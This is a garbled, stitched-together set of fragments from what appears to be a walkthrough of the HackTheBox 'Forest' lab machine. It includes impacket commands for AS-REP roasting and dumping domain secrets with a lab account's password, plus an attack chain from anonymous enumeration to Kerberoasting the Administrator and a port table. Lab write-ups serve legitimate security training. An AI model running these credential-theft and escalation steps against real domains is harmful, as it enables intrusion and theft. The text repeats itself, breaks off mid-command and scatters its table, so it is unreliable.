impacket-GetNPUsers htb.local/ -dc-ip 10.10.10.161 -request -usersfile users.txt
impacket-secretsdump -just-dc htb.local/svc-alfresco:s3rvice@10.10.10.161 forest hackthebox walkthrough best
The presence of WinRM (port 5985) is crucial. If we obtain credentials for a user in the "Remote Management Users" group, we can log in via evil-winrm . impacket-GetNPUsers htb
Anonymous enumeration ↓ LDAP / RPC user list ↓ AS-REP Roasting → svc-alfresco creds ↓ WinRM access → User flag ↓ SeMachineAccountPrivilege + GenericWrite ↓ Add machine account → Set SPN on Admin → Kerberoast ↓ Crack Admin hash → WinRM as Administrator → Root flag | | 5985 | WinRM | Open | | | 9389 |
| Port | Service | State | Observation | |------|---------|-------|--------------| | 53 | DNS | Open | Domain: htb.local | | 88 | Kerberos | Open | Key Distribution Center | | 135 | MSRPC | Open | | | 139/445 | SMB | Open | NetBIOS | | 389 | LDAP | Open | Anonymous bind allowed? | | 5985 | WinRM | Open | | | 9389 | .NET Remoting | Open | |